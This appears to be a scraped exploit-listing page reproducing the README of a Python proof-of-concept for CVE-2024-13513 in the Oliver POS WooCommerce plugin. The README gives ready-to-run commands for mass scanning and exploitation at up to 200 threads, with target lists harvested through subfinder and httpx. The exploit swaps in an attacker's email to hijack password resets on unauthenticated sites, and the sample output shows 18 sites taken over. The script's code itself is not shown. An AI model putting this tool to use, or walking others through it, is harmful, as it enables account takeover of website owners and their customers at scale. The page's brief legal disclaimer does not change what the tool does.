CVE-2024-13513 PoC — WordPress plugin Oliver POS – A WooCommerce Point of Sale 安全漏洞

Source

Associated Vulnerability

Readme

Usage
Basic Usage
bash
python3 exploit.py -l targets.txt -e your-email@example.com
Advanced Usage
bash
python3 exploit.py \
    -l targets.txt \
    -e attacker@email.com \
    -t 100 \
    -o /path/to/results
Parameters Explanation
Parameter	Description	Required	Default
-l, --list	Path to file containing target URLs	✅ Yes	-
-e, --email	Email address for password reset	✅ Yes	-
-t, --threads	Number of concurrent threads	❌ No	50
-o, --output	Output directory for results	❌ No	Current directory
Input File Format
Create a text file (targets.txt) with one URL per line:

text
example.com
https://site1.com
http://site2.com
http://192.168.1.100/wordpress
https://vulnerable-site.org/blog
Output Files
The tool generates several output files:

vulnerable_targets.txt - All detected vulnerable websites

successfully_exploited.txt - Successfully exploited targets with email

Console Output - Real-time scanning progress and statistics

Example Execution
bash
python3 exploit.py -l my_targets.txt -e test@hacker.com -t 80

[ INFO ] Loaded 150 unique targets
[ INFO ] Using email: test@hacker.com
[ INFO ] Threads: 80
[ INFO ] Starting scan...

[ CHECKING ] http://example.com/
[ VULNERABLE ] http://example.com/
[ SUCCESS ] Email changed successfully: http://example.com/
[ NOT FOUND ] http://site2.com/
[ PATCHED ] http://site3.com/

==================================================
SCAN STATISTICS:
Checked:    150
Vulnerable: 23
Exploited:  18
Failed:     5
==================================================
[ INFO ] Execution time: 45.23 seconds
Advanced Examples
Quick Scan with High Threads
bash
python3 exploit.py -l urls.txt -e admin@test.com -t 200
Save Results to Specific Directory
bash
python3 exploit.py -l targets.txt -e test@domain.com -o ./scan_results
Combine with Other Tools
bash
# Use with subfinder and httpx
subfinder -d example.com | httpx -silent | tee targets.txt
python3 exploit.py -l targets.txt -e attack@email.com -t 100
Important Notes
Legal Disclaimer
⚠️ This tool is for educational and authorized penetration testing purposes only.

Only use on websites you own or have explicit permission to test

Unauthorized access to computer systems is illegal

The authors are not responsible for misuse

Technical Details
Vulnerability: CVE-2024-13513 - Oliver POS Plugin < 2.4.2.4

Impact: Allows unauthenticated email change for password reset

Detection: Checks plugin version and existence

Exploitation: Extracts client token from logs and sends crafted request

Performance Tips
Use 50-150 threads for optimal performance

Ensure stable internet connection

Use quality target lists for better results

Monitor system resources during execution

Troubleshooting
Common Issues:

bash
# File not found
[ ERROR ] File not found: targets.txt

# Invalid email format
[ ERROR ] Invalid email format

# Network issues
[ CONN ERROR ] example.com
[ TIMEOUT ] example.com
Solutions:

Ensure target file exists and is readable

Use valid email address format

Check internet connection and firewall settings

Reduce thread count if experiencing timeouts

Output Interpretation
VULNERABLE: Website has vulnerable plugin version

SUCCESS: Email successfully changed on target

PATCHED: Plugin exists but version is patched

NOT FOUND: Plugin not installed or accessible

CONN ERROR: Connection failed

TIMEOUT: Request timed out

This tool provides comprehensive scanning and exploitation capabilities for security professionals conducting authorized vulnerability assessments.

File Snapshot

 [4.0K]  /data/pocs/d93c805d4162f7345967126652d0e63c6c4f1811
├── [ 11K]  CVE-2024-13513.py
└── [3.4K]  README.md

1 directory, 2 files

Remarks